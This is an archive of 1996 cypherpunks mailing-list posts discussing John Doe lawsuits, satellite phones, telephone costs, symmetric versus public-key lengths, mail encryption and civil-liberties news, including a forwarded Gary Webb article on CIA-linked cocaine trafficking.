Date: Wed, 21 Aug 1996 04:41:39 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <2.2.32.19960820101053.0069d994@mail.io.com>
Message-ID: <Pine.SUN.3.94.960820121113.10677A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Greg Broiles wrote:

> At 12:03 PM 8/19/96 -0400, Black Unicorn wrote:
> >On Sun, 18 Aug 1996, Timothy C. May wrote:
> >
> >> At 3:29 AM 8/19/96, Alan Horowitz wrote:
> >> >I suspect they are trying to get a judgement against "John Doe", in the
> >> >hopes of tracking him down later.
> >> >
> >> >Actually, if I had a sizeable judgement against such a John Doe, I could
> >> >probably find a private detective who would find the dude for a
> >> >contingent fee. Wow, a whole new class of factoring (commerce definition)
> >> >opens up. Get me a lawyer....
> 
> Sure, there are collection people who do this regularly; it's also possible
> to sell judgements for a fraction of their face value. 
> 
> >> Lawyers out there can and should correct me if I'm wrong, but I don't
> >> believe either the criminal or civil justice system has the concept of a
> >> "John Doe" trial! The ability to have the advice of an attorney, to
> >> confront one's accusers, cross-examine witnesses, and mount a defense, and
> >> all that constitutional stuff. Rather hard to do if the trial is in the
> >> past tense.
> >> 
> >> Can you cite an example of such a "John Doe" trial in the U.S.?
> >
> >Not exactly, but judgements against John Doe's or even "$956,334.34" are
> >common.  Typically they are default judgements where a property seizure is
> >involved.
> >
> >"The United States of America v. $534,444.00" and "The United States of
> >AMerica v. One Red Porsche" is a common theme.
> 
> It is possible to name unknown defendants in a suit - the tradition is to
> name them as, literally, "John Doe" or "John Does 1-6, unknown Washington
> County Sheriff's Deputies". The idea is that at some point prior to trial
> you'll learn the names of the defendants and then ask the court for
> permission to amend your complaint to add the newly found names. 

I should have been clearer.

Indeed an in rem jurisdiction case relies on the property seizure as
notice.  A default judgement against for example, $233,445.00 and several
unnamed individuals" would clearly have problems along the service of
process lines if ever contested.

Practically speaking, however, the above are judgements against "John
Doe"'s.  Clearly this is not a "trial" in the strict sense of the word.

> But naming someone in a suit is not sufficient to give them notice that
> they've been sued, so that they know to file an answer and otherwise defend
> themselves. At least in Oregon (state & Fed courts, since Fed courts borrow
> the state's rules for service of process, Fed Rul Civ Pro 4(e)(1)), service
> by publication (as mentioned in another message) is only allowed where the
> plaintiff files an affidavit that they have tried every other appropriate
> means of service and they have been unsuccessful, or that they have reason
> to know it will be unsuccessful. ORCP 7(D)(7). Service by publication is
> relatively rare. 

Agreed.

> The connection between the service-of-process problem and the in rem cases
> Black Unicorn mentioned (e.g., "United States v. $405,089.23") is that the
> owner of the property is supposedly put on notice by the seizure or
> attachment of the property itself. A court can exercise jurisdiction over
> *stuff* (e.g., property) and enter a judgement against the stuff even if it
> hasn't gained jurisdiction (via service of process) over the person who owns
> the stuff. In the most common seizures, the stuff is seized from one or more
> people; those people are also given notice of the seizure and their right to
> contest it.
 
Nicely put.

> --
> Greg Broiles                |"Post-rotational nystagmus was the subject of
> gbroiles@netbox.com         |an in-court demonstration by the People
> http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
>                             |Studdard." People v. Quinn 580 NYS2d 818,825.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 21 Aug 1996 04:13:52 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Billy boy's satellites [Was - Floating DataHaven]
In-Reply-To: <ae3de8c50f02100494d9@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960820122328.689C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, Timothy C. May wrote:

<Discussion re LEO satellites deleted>
> 
> There are also two major competing systems, also not yet deployed. One is
> the Microsoft-McCaw Cellular project, another is being done by an aerospace
> company working with Qualcomm, or a subsidiary. Again, the Web should
> produce the information for anyone interested.
> 
> Which of the three (and maybe more) systems will actually get deployed, and
> which will succeed in the market, is an interesting question.
> 
> There's some obvious crypto/GAK/New World Order issues: many countries may
> not care for a communications system which allows citizen-units or enemy
> agents to make phone calls from the middle of the Kalahari desert or from
> within the jungles of Burma.
>

Or the streets of New York or Washington.  Not too long ago, in my former 
life as a federal prosecutor, I attended a Computer Crimes conference at 
Quantico (the FBI part, not the Marine part).  One of the speakers 
discussed LEO satellites and satellite cellular phones.  The "difficulty" 
in wiretapping those phones was of grave concern to most of those present....

EBD

 
> (The Israelis, for example, are insisting that all handheld units have
> Explosives Escrow, for detonation with appropriate official orders.)
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Wed, 21 Aug 1996 07:58:13 +0800
To: cypherpunks@toad.com
Subject: How To Subscribe?
Message-ID: <6e1_9608201252@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



Would someone please netmail me the current subscription procedure?

Thanks.

        JE
--
: Fidonet:  John Erland 1:203/7707.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Wed, 21 Aug 1996 06:32:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Taxes on Internet access prediction
In-Reply-To: <ae3f3913000210049dc3@[205.199.118.202]>
Message-ID: <3219FBBF.5D6A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Net access, if primarily used for work-related things, would not be.
> Just as company phone calls are not treated as a fringe benefit for 
> the employees making the phone calls. Or business trips. And so on.

Sure, but clearly that's not exclusively the case.  (Amazingly enough
to some might be the fact that my for-work e-mail volume far exceeds
my not-for-work volume.)  Hopefully I haven't brought too much shame
to my employer.

In any case, with the IRS it's often less a matter of common sense
than what they happen to decide is The Law.  Witness the changes in
laws about what constitutes a "home office".  Currently, if you're
(let's say) a freelance plumber who maintains a legitimate office 
in your home, where nothing at all but plumbing-related stuff is
kept and plumbing-related work is done (booking jobs over the phone),
but most of your actual workday is spent out under people's sinks 
and most of your money is made out there in the field, then the 
IRS will not allow you to treat that home office as an expense.

(At least, that's my recollection of an NPR story from a year or
two ago.)

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ryan M. Leach" <ryan@tach.net>
Date: Wed, 21 Aug 1996 05:34:39 +0800
To: cypherpunks@toad.com
Subject: ok ok ok i know
Message-ID: <Pine.LNX.3.91.960820125632.14431A-100000@Bogon.Tach.Net>
MIME-Version: 1.0
Content-Type: text/plain


sorry to bother the list with this but i lost the message describing the 
"unsubscribing" methods for this list (it's way to big for me) can some 
one mail me instr. on unsubscribing? TIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Wed, 21 Aug 1996 07:47:18 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: Key Length Correlation
Message-ID: <9608201302.aa18129@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


I've read Blaze and diffie's paper on Semetric Key Length.  I'm currious
how semetric key length correlates to public key cryptography length.  Does
public key length have to be much longer, (assuming the algorithms are strong),
to provide the same level of security as a shorter semetric key?  TIA   
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 20 Aug 1996 21:51:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [NOISE] Naked woman decrapitates man on Internet!!!
In-Reply-To: <ae3eacc200021004a5e4@[205.199.118.202]>
Message-ID: <32199D8B.500F9F30@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 10:30 PM 8/19/96, Ross Wright wrote:
> >Sick, stuff.  Yet everyone has to sneek a peek, just like a car
> >crash.  Hey, I did.  I made the whole trip through the lurid pages.
> >
> 
> Seven billion (thousand million for you Brits) people in the world. More
> than 10,000 deaths every hour, or about 5 deaths per second.

Oh please - show me a Brit who can remember a billion as a million
million, and I'll show you a Brit who remembers pounds, shillings and
pence.

Gary

(PS - I think I've figured out how to change "Trash" to "Rubbish" with
Netscape, just in case anyone's interested).
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 21 Aug 1996 07:45:50 +0800
To: cypherpunks@toad.com
Subject: RFC1984 on Cryptographic Technology
Message-ID: <9608201826.AA26429@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



FYI,

To: IETF-Announce:;@ietf.org
Subject: RFC1984 on Cryptographic Technology
Cc: rfc-ed@isi.edu
Date: Tue, 20 Aug 96 08:40:43 PDT
Sender: ietf-announce-request@ietf.org
From: RFC Editor <rfc-ed@isi.edu>


A new Request for Comments is now available in online RFC libraries.


        RFC 1984:

        Title:      IAB and IESG Statement on Cryptographic Technology
                    and the Internet
        Author:     IAB & IESG
        Date:       August 1996
        Mailbox:    brian@dxcoms.cern.ch, fred@cisco.com
        Pages:      5
        Characters: 10,738
        Updates/Obsoletes:  none

        URL:        ftp://ds.internic.net/rfc/rfc1984.txt


The Internet Architecture Board (IAB) and the Internet Engineering
Steering Group (IESG), the bodies which oversee architecture and
standards for the Internet, are concerned by the need for increased
protection of international commercial transactions on the Internet,
and by the need to offer all Internet users an adequate degree of
privacy.  Security mechanisms being developed in the Internet
Engineering Task Force to meet these needs require and depend on the
international use of adequate cryptographic technology.  Ready access
to such technology is therefore a key factor in the future growth of
the Internet as a motor for international commerce and communication.

[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Wed, 21 Aug 1996 05:49:53 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: AZ DMV: Citizenship to Drive? (fwd)
Message-ID: <1.5.4.32.19960820172648.00cf4364@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 AM 8/20/96 -0400, you wrote:
>Your papers, please?
>
>---------- Forwarded message ----------
>Date: Mon, 19 Aug 1996 21:04:07 -0700 (PDT)
>From: Bob Witanek <bwitanek@igc.apc.org>
>To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
>Subject: AZ DMV: Citizenship to Drive?
>
>Posted: gdiazj@IMAP1.ASU.EDU
>
>Today the Arizona Department of Motor Vehicles began requiring
>proof of citizenship before issuing a drivers license or a state
>identification. This policy was established by HB 2154 which passed
>this last session (this one slipped passed me).
>
>I am helping organize people in Arizona to oppose this.  Please
>send your information ASAP, we need you your help.
>
>VIVA LA RAZA
>George Diaz, Jr.
>gdiazj@imap1.asu.edu
>GDIAZJ@aol.com
>gdiaz@ci.phoenix.az.us
>
Not quite sure what this has to do with crypto, but here goes:

As with the recent federal legislation denying soc sec benefits to LEGAL
aliens who are required by law to pay into the system and can by law be
required to serve in the US armed forces, this appears to my untrained eye
to be yet another case of isolationist paranoia...I am sure this one
violates international agreements that the US has made concerning reciprocal
accodomations as far as driving is concerned.

I used to be a tax-paying soc sec paying legal alien, but I got so fed up
with head-in-the-dirt hicks who thought you had to be a citizen to breathe
the prairie dust that I became a citizen for an easier life (and I mean some
of these ignorant fools were sons of immigrants who voted agianst the US
fighting Hitler!!!!). 

Because I still talk with something of a foreign accent I still get
uneducated idiots, who couldn't pass the test they make foreigners take,
lecturing me on what I cannot do because I am a foreigner. The only thing I
can't do is run for President. 

I despair of backwater state legislators, I really do. What to do about this
particular problem? Check out the rules on International drivers licenses. I
know can drive on them for a year...If you are not allowed a drivers license
because you are an alien, maybe you don't need their stinking licenses.

Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 09:05:43 +0800
To: cypherpunks@toad.com
Subject: Re: Indonesia detains democracy activist after post to mailing list (fwd)
In-Reply-To: <Pine.A32.3.91.960820075229.31719B-100000@rosewood.his.ucsf.edu>
Message-ID: <Pine.GUL.3.95.960820132436.9860B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 20 Aug 1996, Sean McGrath wrote:

> > ...llike the Berkeley administration's reading student email ...
>  
> This was a paranoid fantasy that became a rumor and is on its was to an 
> urban ledgend.  The UC administration does not have the inclination, 
> interest or resources to monitor email.
> 
> Sean McGrath

I have clarified my sarcasm in private email. Apparently there are some new
people here who are unaware that I'm Evil, and thus misinterpreted my
meaning. Anyone who is still confused should check out articles
<199608138907.ZOG@c2.org> and <4urjjj$7v2@Networking.Stanford.EDU> in
comp.org.eff.talk. 

- -rich
 fucking statist holocaust fetishist enemy of freedom content-free flamer (tm)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhogZJNcNyVVy0jxAQEF4wH+M0T4LlIIKZta0EMQjpBf+Vo/Zrxatc/q
dpsjq3qImzoiKb+nYgd+a5tf2T2ai/pJVXgLqVYYfrIMjdNPFYyo3w==
=mvtx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Wed, 21 Aug 1996 05:27:25 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: US Taxes on X-Pats (getting off topic)
Message-ID: <1.5.4.32.19960820173846.007137e4@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 8/19/96 -0400, you wrote:
>It sounds unfair, for sure. However, the whole thing is a fraud based 
>upon a myth. FICA witholding is NOT credited to an individual's account, 
>or even to Social Security benefits in general. By statutory law, all 
>such receipts go into the Treasury's general fund.
>
>So, they are NOT "social security contributions". Period.
>
Very true...what I am saying is that, as far as my reading goes, LEGAL
aliens are going to be required to pay social security "taxes" while not
having any "entitlement" in return. They pay income taxes and get certain
things, like law and order, in return. They will be paying soc sec money to
the government without getting anything in return. This sounds not only
unfair but wrong, part of an isolationist, "we killed the natives so this
land is our land and the rest of you f@*k-off" revival that includes the
recent posting about requiring proof of citizenship before issuing drivers
licenses.

Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Aug 1996 13:49:52 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: Re:phoneco vs X-phone
Message-ID: <199608202048.NAA16694@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 AM 8/20/96 -0700, Brian D Williams wrote:
>
>Jim bell writes:
>
>>What do you mean, "doesn't really fit the facts"?!?  What part of
>>it was incorrect?  Fiber-optic _is_ commonly used in inter-office
>>trunks, right? It doesn't wear out, right?  Higher usage doesn't
>>entail greater costs, right?  The capacity, while not strictly
>>infinite, is high enough so expanded usage doesn't strain most
>>links, right?  Finally, modern phone switches have sufficient
>>connect capacity so that they can handle usage which would have
>>been considered "unusual" by yesteryear's standards.  All 
>>of this points to an obvious conclusion:  Telephone companies do
>>not, in general, have increased costs as a consequence of
>>increased telephone usage.
>
>Fiber does not wear out per se, but it does need replacing, partly
>from the inevitable contractor accidents (landscapers) and
>occasional entropic events.

However, those events are generally uncorrelated with usage...

> Mux cards and repeaters do go bad on a
>regular basis, there is a correlation between usage and increased
>maintenance,

Well, technically that's true, but these devices are usually running 
continuously, not merely when a call is being made.  In other words, more 
talk != more failures. 

For the most relevant (though minor) example that I can think of, consider 
the typical laser diode used to drive fiber optic cables.  These devices 
have a finite wearout mechanism (as opposed to most IC's which generally do 
not wear out in normal usage), so they may be seen to have a limited 
lifetime.  However, in use they are continuously transmitting data, even 
when portions of the channel are unoccupied, so they have a constant life 
regardless of individual phone usage.


>and of course increased usage means increased electricity usage.

This is an extraordinarily minor effect, as you might imagine.


>One point that seems to be missed here is the very high cost of
>compliance with government regulations. If the internet phone
>people have to comply with the same regulations it will drive up
>their costs dramatically, and if the regulations are lifted for
>all, the RBOC's think they can out compete them.

If that is the main difference in costs, then we should abandon those regs.  
Another big cost is billing, which could be eliminated if usage were 
unmetered.   In any case, I tend to agree:  Make these changes, eliminate 
the LD/local subsidy, and  the LD companies would have no problem (at least 
domestically) competing against Internet phone.   (International may be a 
different story, because foreign telcos tend to be owned by countries.)  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Timekeeper) <fair@cesium.clock.org>
Date: Wed, 21 Aug 1996 08:52:55 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <v02140b24ae3fa8d7849e@[17.255.9.110]>
Message-ID: <7314.840575777@cesium.clock.org>
MIME-Version: 1.0
Content-Type: text/plain


While I agree in general, I think I'd rather see effort spent on
getting everyone on message security first, and worry about traffic
analysis later. My fear is that, having attempted (since it's unlikely
we'll ever manage to get 100%) to secure the transport, people will
stop worrying about message security, and let that slide.

To put it another way, the first order of business is to prevent
everyone from reading the mails. We can afford to worry about second
order effects like traffic analysis after message security is well
under way (say, 50% of all nominally private message traffic is
encrypted).

Or, put it yet another way: time for everyone to host a PGP key
signing party for your friends, neighbors, and co-workers!

	Erik E. Fair    fair@clock.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 21 Aug 1996 08:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: phoneco vs x-phones
Message-ID: <199608202121.OAA20223@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Disclaimer: The opinions expressed are my own, I do not speak for
Ameritech or it's alliance partners.

I wrote:

>>One point that seems to be missed here is the very high cost of
>>compliance with government regulations. If the internet phone
>>people have to comply with the same regulations it will drive up
>>their costs dramatically, and if the regulations are lifted for
>>all, the RBOC's think they can out compete them.

Jim Bell replies:

>If that is the main difference in costs, then we should abandon
>those regs. Another big cost is billing, which could be eliminated
>if usage were unmetered.   In any case, I tend to agree:  Make
>these changes, eliminate the LD/local subsidy, and  the LD
>companies would have no problem (at least domestically) competing
>against Internet phone.   (International may be a different story,
>because foreign telcos tend to be owned by countries.)

Yes compliance costs are a sore subject. Billing costs are actually
very cheap,(the mainframes are on the floor above me) the
difference between sending a metered bill or a flat rate bill is
tiny. Really tiny (NDA). The local/long distance subsidy was
eliminated at breakup, but long distance companies do have to pay
to use local networks, but as competition heats up these rates are
dropping and new players (competitors) join the table, Or they can
build their own. ;) 

One of the fun turns of events might be that the threat of x-phones
might lead the RBOC's to actually turn into an ISP's! We could pull
this off at amazing speed. (if you can't beat them, join them!) We
are after all one of the four major nodes of the Internet......

Heh heh heh.......


Brian

"Zazen? Well it beats sitting around on your ass all day doing
nothing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Aug 1996 09:23:38 +0800
To: cypherpunks@toad.com>
Subject: Re: Key Length Correlation
Message-ID: <199608202153.OAA21170@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:02 PM 8/20/96 -0700, Jeff Davis wrote:
>I've read Blaze and diffie's paper on Semetric Key Length.  I'm currious
>how semetric key length correlates to public key cryptography length.  Does
>public key length have to be much longer, (assuming the algorithms are strong),
>to provide the same level of security as a shorter semetric key?  TIA   

According to Applied Cryptography V2, 

     Symmetric and Public-key Key Lengths 
with Similar Resistances to Brute-Force Attacks

      Symmetric                Public-key
      Key Length               Key Length
       56 bits                  348 bits
       64 bits                  512 bits
       80 bits                  768 bits
       112 bits                 1792 bits
       128 bits                 2304 bits

Regards - Bill


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 21 Aug 1996 01:05:29 +0800
To: bryce@digicash.com
Subject: Re: search engine improvement
In-Reply-To: <199608191931.VAA02971@digicash.com>
Message-ID: <3219B61D.7566F4CF@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Keywords: distributed ratings systems, search engines, spiders,
> spiderspace, idea futures, The Shockwave Rider, John Brunner
> 
> You know there is a trick that might greatly improve the
> effectiveness of a search engine at almost no cost to the end
> user.  It is the well-known heuristic of "If Person A likes X
> and Y, and Person B likes X, then Person B probably likes Y.",
> combined with passive polling (which is getting information
> about people's opinions just by watching their actions, instead
> of by asking them).

Have you seen the similarities engine
(http://www.ari.net/se/ise/001/WC000001.html) that tries to find
similarities between bands?  I can't see a reason this wouldn't work for
web pages.  (Films would be noce too).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Wed, 21 Aug 1996 13:16:10 +0800
To: cmcurtin@research.megasoft.com
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <199608201529.LAA01469@goffette.research.megasoft.com>
Message-ID: <v03007821ae3fe53616d2@[205.214.160.151]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:29 AM -0700 8/20/96, C Matthew Curtin wrote:
>    2. Waiting for a cryptographic transport layer network protocol
>       (such as what is being proposed in draft-ietf-tls-ssh-00),
>       allowing SMTP to remain untouched, and only requiring MTAs to
>       add support for the new network protocol.
>
>I like the second approach better, because it allows more problems to
>be solved with one move, and it would be easier to add crypto

	This presumes that everyone uses Internet protocols for transport.

	That is a marginal assumption, in today's world.

	Probably ok for long term, though.

d/

--------------------
Dave Crocker                                            +1 408 246 8253
Brandenburg Consulting                             fax: +1 408 249 6205
675 Spruce Dr.                                 dcrocker@brandenburg.com
Sunnyvale CA 94086 USA                       http://www.brandenburg.com

Internet Mail Consortium               http://www.imc.org, info@imc.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Tue, 20 Aug 1996 15:49:19 +0800
To: cypherpunks@toad.com
Subject: CIA Contra Crack and LA Gangs (fwd)
Message-ID: <199608200513.PAA23414@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From notes@igc.org  Tue Aug 20 15:07:25 1996
Date: Mon, 19 Aug 1996 20:27:27 -0700 (PDT)
Reply-To: Moderator of conference "justice.polabuse" <bwitanek@igc.apc.org>
From: Bob Witanek <bwitanek@igc.apc.org>
Subject: CIA Contra Crack and LA Gangs
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Message-ID: <APC&1'0'a9f98b64'6db@igc.apc.org>
X-Gateway: conf2mail@igc.apc.org
Errors-To: owner-pol-abuse@igc.apc.org
Precedence: bulk
Lines: 364

From: Bob Witanek <bwitanek@igc.apc.org>

Posted mnovick@laedu.lalc.k12.ca.us  Sun Aug 18 22:23:45 1996

This is an astonishing mainstream media documentation of the role of the
U.S. state in the guns for drugs trade and its social devastation results in
the U.S. Although the piece focuses on U.S. involvement on the guns end in
Central America, this was a clear two-birds with one stone
counter-insurgency strategy at this end, too.  Given the continuing effect
of crack (and its hypocritical super-criminalization by the government),
genocide is probably too  mild a word for this.

'80s effort to assist guerrillas left legacy of drugs, gangs in black L.A.
By Gary Webb

Mercury News Staff Writer

For the better part of a decade, a Bay Area drug ring sold tons of cocaine to 
the Crips and Bloods street gangs of Los Angeles and funneled millions in drug 
profits to a Latin American guerrilla army run by the U.S. Central Intelligence 
Agency, a Mercury News investigation has found.

This drug network opened the first pipeline between Colombia's cocaine cartels 
and the black neighborhoods of Los Angeles, a city now known as the ``crack'' 
capital of the world. The cocaine that flooded in helped spark a crack explosion
 in urban America -- and provided the cash and connections needed for L.A.'s 
gangs to buy automatic weapons.

It is one of the most bizarre alliances in modern history: the union of a 
U.S.-backed army attempting to overthrow a revolutionary socialist government 
and the Uzi-toting ``gangstas'' of Compton and South-Central Los Angeles.

The army's financiers -- who met with CIA agents both before and during the time
 they were selling the drugs in L.A. -- delivered cut-rate cocaine to the gangs 
through a young South-Central crack dealer named Ricky Donnell Ross.

Unaware of his suppliers' military and political connections, ``Freeway Rick"'' 
-- a dope dealer of mythic proportions in the L.A. drug world -- turned the 
cocaine powder into crack and wholesaled it to gangs across the country.

The cash Ross paid for the cocaine, court records show, was then used to buy 
weapons and equipment for a guerrilla army named the Fuerza Democratica 
Nicaraguense (Nicaraguan Democratic Force) or FDN, the largest of several 
anti-communist groups commonly called the Contras.

While the FDN's war is barely a memory today, black America is still dealing 
with its poisonous side effects. Urban neighborhoods are grappling with legions 
of homeless crack addicts. Thousands of young black men are serving long prison 
sentences for selling cocaine -- a drug that was virtually unobtainable in black
 neighborhoods before members of the CIA's army brought it into South-Central in
 the 1980s at bargain-basement prices.

And the L.A. gangs, which used their enormous cocaine profits to arm themselves 
and spread crack across the country, are still thriving, turning entire blocks 
of major cities into occasional war zones.

``There is a saying that the ends justify the means,'' former FDN leader and 
drug dealer Oscar Danilo Blandon Reyes testified during a recent cocaine 
trafficking trial in San Diego. ``And that's what Mr. Bermudez (the CIA agent 
who commanded the FDN) told us in Honduras, OK? So we started raising money for 
the Contra revolution.''

Recently declassified reports, federal court testimony, undercover tapes, court 
records here and abroad and hundreds of hours of interviews over the past 12 
months leave no doubt that Blandon was no ordinary drug dealer.

Shortly before Blandon -- who had been the drug ring's Southern California 
distributor -- took the stand in San Diego as a witness for the U.S. Department 
of Justice, federal prosecutors obtained a court order preventing defense 
lawyers from delving into his ties to the CIA.

Blandon, one of the FDN's founders in California, ``will admit that he was a 
large-scale dealer in cocaine, and there is no additional benefit to any 
defendant to inquire as to the Central Intelligence Agency,'' Assistant U.S. 
Attorney L.J. O'Neale argued in his motion shortly before Ross' trial on cocaine
 trafficking charges in March.

The most Blandon would say in court about who called the shots when he sold 
cocaine for the FDN was that ``we received orders from the -- from other 
people.''

The 5,000-man FDN, records show, was created in mid-1981 when the CIA combined 
several existing groups of anti-communist exiles into a unified force it hoped 
would topple the new socialist government of Nicaragua.

>From 1982 to 1988, the FDN -- run by both American and Nicaraguan CIA
agents -- 
waged a losing war against Nicaragua's Sandinista government, the 
Cuban-supported socialists who'd overthrown U.S.-backed dictator Anastasio 
Somoza in 1979.

Blandon, who began working for the FDN's drug operation in late 1981, testified 
that the drug ring sold almost a ton of cocaine in the United States that year 
-- $54 million worth at prevailing wholesale prices. It was not clear how much 
of the money found its way back to the CIA's army, but Blandon testified that 
``whatever we were running in L.A., the profit was going for the Contra 
revolution.''

At the time of that testimony, Blandon was a full-time informant for the Drug 
Enforcement Administration, a job the U.S. Department of Justice got him after 
releasing him from prison in 1994.

Though Blandon admitted to crimes that have sent others away for life, the 
Justice Department turned him loose on unsupervised probation after only 28 
months behind bars and has paid him more than $166,000 since, court records 
show.

``He has been extraordinarily helpful,'' federal prosecutor O'Neale told 
Blandon's judge in a plea for the trafficker's release in 1994. Though O'Neale 
once described Blandon to a grand jury as ``the biggest Nicaraguan cocaine 
dealer in the United States,'' the prosecutor would not discuss him with the 
Mercury News.

A known dealer since '74

has stayed out of U.S. jails

Blandon's boss in the FDN's cocaine operation, Juan Norwin Meneses Cantarero, 
has never spent a day in a U.S. prison, even though the federal government has 
been aware of his cocaine dealings since at least 1974, records show.

Meneses -- who ran the drug ring from his homes in the Bay Area -- is listed in 
the DEA's computers as a major international drug smuggler and was implicated in
 45 separate federal investigations. Yet he and his cocaine-dealing relatives 
lived quite openly in the Bay Area for years, buying homes in Pacifica and 
Burlingame, along with bars, restaurants, car lots and factories in San 
Francisco, Hayward and Oakland.

``I even drove my own cars, registered in my name,'' Meneses said during a 
recent interview in Nicaragua.

Meneses' organization was ``the target of unsuccessful investigative attempts 
for many years,'' prosecutor O'Neale acknowledged in a 1994 affidavit. But 
records and interviews revealed that a number of those probes were stymied not 
by the elusive Meneses but by agencies of the U.S. government.

Agents from four organizations -- the DEA, U.S. Customs, the Los Angeles County 
Sheriff's Department and the California Bureau of Narcotic Enforcement -- have 
complained that investigations were hampered by the CIA or unnamed ``national 
security'' interests.

1988 investigation

hit a wall of secrecy

One 1988 investigation by a U.S. Senate subcommittee ran into a wall of official
 secrecy at the Justice Department.

